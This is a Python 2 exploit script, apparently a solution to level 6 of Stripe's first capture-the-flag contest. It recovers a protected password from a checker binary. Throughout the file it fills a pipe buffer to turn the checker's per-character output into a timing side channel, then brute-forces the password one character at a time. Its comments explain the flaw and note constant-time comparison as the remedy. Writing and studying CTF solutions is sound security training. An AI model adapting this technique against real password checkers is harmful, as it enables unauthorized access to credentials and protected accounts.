Exploit in Python for level 6 of Stripe's first CTF.
import select
import string
import sys
from os import pipe, write, close
from subprocess import Popen, PIPE
# Pipe buffer capacity the script assumes: 64 KiB.
# NOTE(review): presumably the default pipe capacity on the target host -- confirm there.
PIPE_MAX = 2 ** 16
# Byte length of the banner line; correct() reserves this much room in the
# stderr pipe.  Presumably the checker prints this banner first -- confirm.
WELCOME_LEN = len("Welcome to the password checker!\n")
def args(guess):
    """Build the argv list used to launch the level 6 checker with *guess*.

    The list holds the checker executable, the path of the password file it
    is pointed at, and the candidate string, in that order.
    """
    binary = '/levels/level06'
    password_file = '/home/the-flag/.password'
    return [binary, password_file, guess]
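def correct(guess):
    """Report whether the checker stayed silent on stdout for *guess*.

    The stderr pipe is pre-filled so that only ``WELCOME_LEN + len(guess)``
    bytes of room remain, the checker is started with ``guess + '?'``, and
    stdout is polled for 10 ms.  No stdout activity in that window is taken
    to mean every character of *guess* matched.

    NOTE(review): this relies on checker behaviour that is not visible in
    this file -- presumably a banner plus one progress byte per compared
    character on stderr, and stdout output on the first mismatch.  Confirm
    against the checker's source.  If that holds, the weakness demonstrated
    is that comparison progress is observable from outside the process; a
    checker that emits nothing per character and reports only after a full
    constant-time comparison would not expose this signal.

    Python 2 only as written: ``os.write`` is handed a ``str``.

    Returns:
        True when stdout was not readable within the timeout, else False.
    """
    padding = '?' * (PIPE_MAX - WELCOME_LEN - len(guess))
    stdout_r, stdout_w = pipe()
    stderr_r, stderr_w = pipe()
    process = None
    try:
        # Fill stderr before the child starts so its writes meet a nearly
        # full pipe from the first byte.
        write(stderr_w, padding)
        process = Popen(args(guess + '?'), stdout=stdout_w, stderr=stderr_w)
        readable, _, _ = select.select([stdout_r], [], [], 0.01)
        return not readable
    finally:
        # Release the descriptors and signal the child even when the write,
        # the spawn or the poll raised, so a failed probe does not leak them.
        for fd in (stdout_r, stdout_w, stderr_r, stderr_w):
            close(fd)
        if process is not None:
            process.terminate()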
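def finished(guess):
    """Return True when the checker's stderr for *guess* contains 'password was'.

    The checker is run to completion with *guess* as the candidate and its
    stderr is searched for that marker.  Presumably the marker is part of the
    checker's success message -- confirm against the checker's source.

    Python 2 only as written: the captured output is compared with a ``str``.
    """
    checker = Popen(args(guess), stdout=PIPE, stderr=PIPE)
    # communicate() drains both pipes and waits for the child.  Reading only
    # stderr left stdout unread (a stall if it ever filled) and never
    # collected the child's exit status.
    _, err = checker.communicate()
    return 'password was' in err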
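# Candidate alphabet: ASCII letters, digits and punctuation (no whitespace).
# ascii_letters is the locale-independent form of string.letters.
characters = string.ascii_letters + string.digits + string.punctuation
guess = ''
# Extend the recovered prefix one character at a time until the checker's
# output for the whole guess contains the marker finished() looks for.
while not finished(guess):
    for g in characters:
        new_guess = guess + g
        sys.stdout.write('Trying: %s\r' % new_guess)
        sys.stdout.flush()
        if correct(new_guess):
            guess = new_guess
            break
    else:
        # No candidate was accepted, so another pass would repeat the same
        # probes forever; stop with a non-zero exit status instead.
        sys.exit("\nNo candidate extended %r; stopping" % guess)
sys.stdout.write("\nPassword is: " + guess + "\n")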